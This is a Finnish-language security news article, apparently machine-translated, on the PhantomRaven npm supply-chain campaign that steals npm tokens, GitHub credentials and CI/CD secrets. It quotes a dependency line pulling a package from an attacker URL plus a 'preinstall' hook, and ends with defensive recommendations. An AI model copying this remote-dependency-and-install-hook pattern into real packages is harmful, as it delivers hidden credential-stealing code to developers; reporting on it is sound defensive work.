Jatkuva PhantomRavenin npm-toimitusketjuhyökkäys on hienostunut haittaohjelmakampanja, joka kohdistuu kehittäjiin maailmanlaajuisesti. Hyökkäys on levinnyt elokuusta 2025 lähtien 126 haitallista npm-pakettia jotka yhteensä on ladattu yli 86 000 kertaa. Tavoitteena on varastaa npm-todennustokenit, GitHub-kirjautumistiedot ja CI/CD-salaisuudet, samalla kun käytetään edistyneitä havaitsemisen väistötekniikoita useimpien tietoturvatyökalujen ohittamiseen.

Analyytikko Koi-turvallisuus tunnisti kampanjan lokakuussa 2025, kun heidän toiminnan seurantajärjestelmänsä Wings merkitsi epäilyttävää verkkotoimintaa pakettien asennuksen aikana. Kaikki haitalliset paketit tekivät ulkoisia pyyntöjä samaan verkkotunnukseen, mikä paljasti koordinoidun ja globaalin Käyttö.

Miten PhantomRavenin npm-toimitusketjuhyökkäys toimii

Koi-tutkijoiden tekemä tutkimus paljasti selkeän aikajanan. Ensimmäiset 21 pakettia löydettiin ja poistettiin elokuussa 2025. Pian sen jälkeen hyökkääjät muokkasivat strategiaansa ja onnistuivat julkaisemaan syyskuun ja lokakuun välisenä aikana vielä 80 pakettia, jotka kiersivät täysin tavanomaiset tunnistusmekanismit. Hyökkääjän infrastruktuuri osoittaa ristiriidan teknologisesti edistyneen toteutuksen ja yllättävän huolimattoman operatiivisen turvallisuuden välillä.

Mainos

Haitallisen koodin piilottamiseksi hyökkääjät käyttivät tekniikkaa, jossa etädynaamiset riippuvuudet. Se sallii riippuvuuksien määrittelyn HTTP-URL-osoitteiden kautta npm-rekisterin sijaan, esimerkiksi:
“ui-styles-pkg”: “http://packages.storeartifact.com/ui-styles-pkg.tgz”.
Kun tällainen paketti asennetaan, npm hakee ulkoisen riippuvuuden automaattisesti ilman minkäänlaista tietoturvan validointia tai läpinäkyvyyttä.

Tämä tarkoittaa, että koodi, joka ladataan osoitteeseen npmjs.com voi näyttää täysin harmittomalta – usein vain “hello world” -skriptiltä – kun taas varsinainen haitallinen hyötykuorma noudetaan dynaamisesti hyökkääjän palvelimelta asennuksen yhteydessä. Tällä tavoin PhantomRaven-hyökkääjät ohittavat sekä staattisen koodin analyysin että riippuvuuksien skannauksen.

Piilotetut riippuvuudet ja automaattinen suoritus

Kun näkymätön riippuvuus saapuu uhrin järjestelmään, haitallinen koodi aktivoituu välittömästi npm:n elinkaarikomentosarjan kautta. Manipuloitu paketti.jsonTiedosto sisältää esiasennusskriptin nimeltä “preinstall”: “node index.js”, joka suoritetaan automaattisesti käyttäjän tietämättä. Sillä ei ole väliä, kuinka syvällä riippuvuuspuussa paketti sijaitsee – mikä tahansa näennäisesti laillisen paketin asennus voi laukaista haitallisen suorituksen.

The PhantomRavenin npm-toimitusketjuhyökkäys hyödyntäen näin npm:n luontaista joustavuutta haitallisen koodin toimittamiseen reaaliajassa. Koska jokainen asennus hakee riippuvuuden uudelleen hyökkääjän palvelimelta, hyötykuormaa voidaan myös mukauttaa kohdeympäristöön, mikä tekee hyökkäyksestä erittäin vaikean. havaita ja pysäyttää.

Mitä hyökkääjät keräävät

Onnistuneen asennuksen jälkeen PhantomRaven kerää järjestelmällisesti sähköpostiosoitteita ympäristömuuttujista, gitconfigtiedostot, npmrc-määritykset ja tekijäkentät kohdassa paketti.json. Se myös poistaa CI/CD-tunnistetiedot, mukaan lukien GitHub Actions -tokenit, GitLabin CI-avaimet, Jenkins-kirjautumiset, CircleCI-tokenit ja npm-julkaisutunnukset.

Haittaohjelma suorittaa sitten täyden järjestelmän profiloinnin: julkiset IP-osoitteet, isäntänimet, käyttöjärjestelmät, Node.js-versiot ja verkkoasetukset kerätään yritysten verkkojen ja yksittäisten kehittäjien tietokoneiden erottamiseksi toisistaan. Näitä tietoja käytetään arvokkaiden kohteiden tunnistamiseen, joihin hyökkääjät voivat saada laajemman pääsyn tai levittää hyökkäyksiä.

Toiminnallinen huolimattomuus ja seuranta

Teknisestä osaamisesta huolimatta infrastruktuuri näkyy merkkejä toiminnallisesta huolimattomuudesta. Useita sähköpostitilejä luotiin peräkkäin ilmaispalveluiden kautta – jpdtester01@hotmail.com että jpdtester13@gmail.com – ja käyttäjätunnus npmhell ja npmpackagejpd toistuu useissa paketeissa. Tämä epäjohdonmukaisuus on mahdollistanut tutkijoiden jäljittää kampanjan yhteen toimijaan, mikä antaa toivoa tulevasta tunnistamisesta ja syytteeseenpanosta.

Suositellut suojatoimenpiteet

1. Kierrätä kaikki mahdollisesti paljastuneet tokenit ja API-avaimet (GitHub, npm, CI/CD).
2. Näytä paketti.jsontiedostot ja tunnista kaikki riippuvuudet, jotka viittaavat HTTP-URL-osoitteisiin. Estä tai poista ne.
3. Ota käyttöön SBOM-työkaluja, kuten CycloneDX tai SPDX saadaksesi täyden näkyvyyden riippuvuuksiin ja versiohistoriaan.
4. Rajoita token-käyttöoikeuksia, käytä lyhytaikaisia salaisuuksia ja ota käyttöön automaattinen rotaatio.
5. Ota käyttöön CI/CD-ympäristöjen käyttäytymisen seuranta, kuten uusien pakettien hiekkalaatikkoanalyysi ennen niiden käyttöönottoa.
6. Seuraa OWASP-ohjelmistokomponenttien varmennusstandardi kolmansien osapuolten riippuvuuksien turvalliseen käsittelyyn.
7. Harkitse yksityisten npm-rekisterien käyttöä ja riippuvuuksien validointia ennen julkaisemista vähentääksesi riski manipulointiin avoimissa ekosysteemeissä.

Analyysi ja merkitys toimialalle

Hyökkäysten kasvava laajuus PhantomRavenin npm-toimitusketjuhyökkäys osoittaa selvästi, kuinka riippuvuusketjusta on tullut yksi ohjelmistojen suurimmista haavoittuvuuksista. Yritysten rakentaessa avoimen lähdekoodin ja tuhansia Kolmannen osapuolen paketit lisäävät riskiä, että yhdelläkin vaarantuneella komponentilla on valtavia seurauksia.

IT-organisaatioille tämä tarkoittaa, että tietoturva ei enää koske vain verkkoja tai loppukäyttäjiä – se koskee koko kehitysketjua. Turvallinen koodinhallinta, luotettavat riippuvuudet ja toimitusketjun jatkuva analysointi ovat strateginen kysymys pikemminkin kuin tekninen yksityiskohta.

Kampanja osoittaa myös, että hyökkääjät ovat alkaneet ajatella kuin kehittäjät: he hyödyntävät työkalujen, kuten npm:n, olemassa olevia ominaisuuksia levittääkseen haittaohjelmia tavalla, joka näyttää täysin lailliselta. Tämä edellyttää muutosta siinä, miten yritykset valvovat ja tarkistavat ohjelmistojaan.

Ruotsalaisille ja pohjoismaisille yrityksille tapahtuma korostaa asiantuntemuksen rakentamisen tärkeyttä ohjelmistojen toimitusketjun turvallisuus ja noudattaa kansainvälisiä standardeja. Ennakoivan valvonnan, tiedon jakamisen ja avoimen toiminnan avulla yhteistyön ansiosta toimiala voi olla paremmin valmistautunut seuraava suuri hyökkäys.